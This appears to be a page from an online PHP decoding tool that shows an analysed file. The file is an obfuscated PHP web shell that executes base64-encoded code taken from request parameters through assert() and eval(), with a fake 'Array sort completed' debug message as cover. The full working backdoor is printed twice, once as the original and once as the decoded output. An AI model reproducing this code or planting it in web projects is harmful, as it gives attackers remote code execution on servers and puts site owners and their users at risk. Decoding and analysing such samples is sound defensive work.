Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php if ( $_REQUEST["array"] ) { @assert(base64_decode($_REQUEST["array"]))..
Decoded Output download
<?php
if ( $_REQUEST["array"] )
{
@assert(base64_decode($_REQUEST["array"]));
//debug message
echo "Array sort completed";
exit();
}
$ndss41= "d4taes_pob6c" ;$wcac96 = strtolower ($ndss41[9].$ndss41[3].$ndss41[5]. $ndss41[4] .$ndss41[10].$ndss41[1]. $ndss41[6] . $ndss41[0].$ndss41[4]. $ndss41[11]. $ndss41[8].$ndss41[0]. $ndss41[4] ); $sbg9=strtoupper ( $ndss41[6]. $ndss41[7]. $ndss41[8].$ndss41[5]. $ndss41[2] );if(isset( ${$sbg9 } ['nf385ab' ] )){ eval( $wcac96( ${$sbg9} [ 'nf385ab' ] )); }?>
Did this file decode correctly?
Original Code
<?php
if ( $_REQUEST["array"] )
{
@assert(base64_decode($_REQUEST["array"]));
//debug message
echo "Array sort completed";
exit();
}
$ndss41= "d4taes_pob6c" ;$wcac96 = strtolower ($ndss41[9].$ndss41[3].$ndss41[5]. $ndss41[4] .$ndss41[10].$ndss41[1]. $ndss41[6] . $ndss41[0].$ndss41[4]. $ndss41[11]. $ndss41[8].$ndss41[0]. $ndss41[4] ); $sbg9=strtoupper ( $ndss41[6]. $ndss41[7]. $ndss41[8].$ndss41[5]. $ndss41[2] );if(isset( ${$sbg9 } ['nf385ab' ] )){ eval( $wcac96( ${$sbg9} [ 'nf385ab' ] )); }?>
Function Calls
| strtolower | 1 |
| strtoupper | 1 |
Stats
| MD5 | 7c6a1989628160e765898def373ba0e3 |
| Eval Count | 0 |
| Decode Time | 132 ms |